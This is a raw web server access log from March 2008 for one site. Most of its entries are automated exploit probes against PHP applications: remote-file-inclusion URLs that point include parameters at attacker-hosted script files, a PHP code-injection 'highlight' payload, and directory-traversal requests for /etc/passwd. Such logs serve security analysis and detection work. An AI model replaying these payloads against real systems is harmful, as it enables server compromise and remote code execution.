64.239.160.112 - - [27/Mar/2008:06:56:18 -0700] "GET /logs/access_080225.log//oneadmin/photogallery/include.php?path[docroot]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:56:20 -0700] "GET /logs/access_080225.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:56:43 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:57:23 -0700] "GET /logs/access_080223.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:58:00 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:58:00 -0700] "GET /logs/access_080213.log/services.php?page=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:58:01 -0700] "GET /services.php?page=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:58:01 -0700] "GET /logs/services.php?page=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:58:04 -0700] "GET /logs/access_080124.log/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.232.156.130 - - [27/Mar/2008:06:58:35 -0700] "GET /logs/access_080215.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.130 - - [27/Mar/2008:06:58:35 -0700] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 200 40554 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:06:58:53 -0700] "GET /index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.71.9.25 - - [27/Mar/2008:06:59:36 -0700] "GET //aMember/plugins/db/mysql/mysql.inc.php?config=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.71.9.25 - - [27/Mar/2008:06:59:42 -0700] "GET /logs//aMember/plugins/db/mysql/mysql.inc.php?config=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.87.139.98 - - [27/Mar/2008:06:59:46 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.224.6.43 - - [27/Mar/2008:07:00:06 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:00:23 -0700] "GET /logs/access_071227.log/modules/My_eGallery/index.php?basepath=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:00:24 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:00:24 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:01:20 -0700] "GET /logs/access_080219.log//hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:01:21 -0700] "GET /logs/access_080219.log//hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:01:21 -0700] "GET /%3Cvuln%3Ehttp://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:01:21 -0700] "GET /logs/%3Cvuln%3Ehttp://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
85.214.86.231 - - [27/Mar/2008:07:02:00 -0700] "GET /logs//addons/guildbank/searcharrays.inc.php?addonDir=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.214.86.231 - - [27/Mar/2008:07:02:01 -0700] "GET //addons/guildbank/searcharrays.inc.php?addonDir=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:07:03:26 -0700] "GET /logs/access_080225.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:03:35 -0700] "GET /logs/access_080119.log/modules/My_eGallery/index.php?basepath=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:04:37 -0700] "GET /logs//?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 40554 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:04:42 -0700] "GET //?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 3094 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:07:04:43 -0700] "GET /logs/access_080225.log//modules/My_eGallery/header.php?basepath=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:07:04:43 -0700] "GET //modules/My_eGallery/header.php?basepath=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:07:04:43 -0700] "GET /logs//modules/My_eGallery/header.php?basepath=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:04:57 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:04:57 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:07:04:57 -0700] "GET /logs/access_080119.log//modules/My_eGallery/header.php?basepath=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:05:05 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:05:05 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:05:13 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
66.232.156.130 - - [27/Mar/2008:07:05:21 -0700] "GET /logs/access_080207.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.28 - - [27/Mar/2008:07:06:11 -0700] "GET //hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:06:19 -0700] "GET /logs/access_080222.log/services.php?page=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.126.36.234 - - [27/Mar/2008:07:07:26 -0700] "GET /logs/access_080218.log/modifyform.html?code=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [27/Mar/2008:07:07:26 -0700] "GET /modifyform.html?code=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:07:07:48 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:07:07:48 -0700] "GET /mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:07:07:48 -0700] "GET /logs/mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:07:07:55 -0700] "GET /logs/access_080225.log//modules/My_eGallery/header.php?basepath=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:07:07:55 -0700] "GET //modules/My_eGallery/header.php?basepath=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:07:07:56 -0700] "GET /logs//modules/My_eGallery/header.php?basepath=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:07:07:57 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:07:07:58 -0700] "GET /mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:07:07:58 -0700] "GET /logs/mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:08:21 -0700] "GET /logs/access_080312.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:07:08:21 -0700] "GET /logs/access_080126.log/mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:07:08:26 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.feedusers.com/th/images/.errors.php/asc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:07:08:27 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.feedusers.com/th/images/.errors.php/asc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:07:08:27 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.feedusers.com/th/images/.errors.php/asc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:07:08:34 -0700] "GET /logs/access_080126.log/mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:08:47 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:08:47 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:08:48 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:08:48 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
65.168.71.54 - - [27/Mar/2008:07:08:48 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "www.dmulk.com"
85.214.86.231 - - [27/Mar/2008:07:08:48 -0700] "GET /mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.214.86.231 - - [27/Mar/2008:07:08:48 -0700] "GET /logs/mambots/content/multithumb/offline.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:07:08:49 -0700] "GET /logs/access_080119.log//modules/My_eGallery/header.php?basepath=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:07:09:48 -0700] "GET //security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://www.thehogbitch.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:07:09:48 -0700] "GET /logs//security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://www.thehogbitch.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
209.200.254.233 - - [27/Mar/2008:07:10:22 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:07:11:04 -0700] "GET /logs/access_080119.log/index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:07:11:05 -0700] "GET /logs/index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:07:12:33 -0700] "GET /index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:12:36 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:12:37 -0700] "GET /index.php?pagina1=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:12:37 -0700] "GET /logs/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.47.228 - - [27/Mar/2008:07:13:12 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/injitinjitsemut/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [27/Mar/2008:07:13:12 -0700] "GET /mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/injitinjitsemut/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [27/Mar/2008:07:13:13 -0700] "GET /logs/mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/injitinjitsemut/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:07:13:14 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:07:13:14 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:13:20 -0700] "GET /logs/access_080131.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:07:14:15 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [27/Mar/2008:07:14:27 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/injitinjitsemut/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.174.10 - - [27/Mar/2008:07:15:19 -0700] "GET /logs/access_071229.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.174.10 - - [27/Mar/2008:07:15:20 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.174.10 - - [27/Mar/2008:07:15:20 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.252.17.105 - - [27/Mar/2008:07:16:05 -0700] "GET /logs/access_080117.log/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.glowacz.de/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [27/Mar/2008:07:16:05 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.glowacz.de/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [27/Mar/2008:07:16:06 -0700] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.glowacz.de/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [27/Mar/2008:07:16:07 -0700] "GET /logs/access_080131.log/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.glowacz.de/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:07:17:23 -0700] "GET /logs/access_080125.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.feedusers.com/th/images/.errors.php/asc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:17:46 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:17:46 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:07:18:43 -0700] "GET //confirm.php?include_location=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:07:18:43 -0700] "GET /logs//confirm.php?include_location=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:07:19:01 -0700] "GET //index.php?include_location=http://www.thehogbitch.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:07:19:05 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:19:11 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:19:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:07:19:12 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:07:19:26 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:07:19:26 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:07:19:26 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:20:03 -0700] "GET /logs/access_080119.log/index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:20:03 -0700] "GET /logs/index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
